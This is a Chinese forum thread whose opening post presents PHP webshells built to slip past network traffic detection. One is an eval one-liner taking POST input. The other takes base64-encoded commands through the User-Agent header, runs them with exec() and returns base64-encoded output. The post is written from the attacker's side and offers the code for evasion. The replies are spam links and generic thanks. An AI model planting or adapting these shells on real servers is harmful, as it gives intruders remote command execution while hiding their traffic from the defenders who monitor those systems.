天涯论坛

 找回密码
 立即注册
搜索
查看: 57|回复: 2

PHPwebshell 流量加密

[复制链接]

3039

主题

148

回帖

9911万

积分

论坛元老

Rank: 8Rank: 8

积分
99119141
发表于 2024-7-11 02:12:43 | 显示全部楼层 |阅读模式

PHPwebshell 流量加密分析

日前市场上的安全设备针对恶意数据流都可精细检测其特征,而常规的一句话木马、菜刀等特征过于显著况且大部分的黑客工具都被加入特征库,因此攻击方的攻击手法很容易被针对,攻击链路很容易被还原。

php一句话

<?php eval(@$_POST[a]); ?>常规的一句话木马传输参数均为明文传输,很容被针对检测。

一句话webshell拜访
一句话webshell流量

简单加密

常规的webshell是将所需的payload经过post进行传参,很容易被流量设备检测。如下,能够经过user_agent base64加密进行传参执行命令。

Webshell原代码:

<?php

$dd = $_SERVER[HTTP_USER_AGENT’];

//获取user_agent参数

$qq = base64_decode($dd);

//解密user_agent参数

$jjj = exec ($qq,$out);

//执行user_agent参数

for ($i=0 ;$i < count($out) ;$i++){

$ls = $ls.$out[$i]."\n";

}

echo base64_encode($ls);

//加密输入执行后的系统命令

?>

user_agent传参
数据流量图

顺手配上一个简单python





上一篇:PHP加密解密详解
下一篇:php 实现RC4加密解密
回复

使用道具 举报

0

主题

1万

回帖

1

积分

新手上路

Rank: 1

积分
1
发表于 2024-8-31 17:38:08 | 显示全部楼层
可以发布外链的网站 http://www.fok120.com/
回复

使用道具 举报

3069

主题

2万

回帖

9913万

积分

论坛元老

Rank: 8Rank: 8

积分
99138952
发表于 2024-11-2 16:11:36 | 显示全部楼层
楼主的文章深得我心,表示由衷的感谢!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|天涯论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-22 22:44 , Processed in 0.119249 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.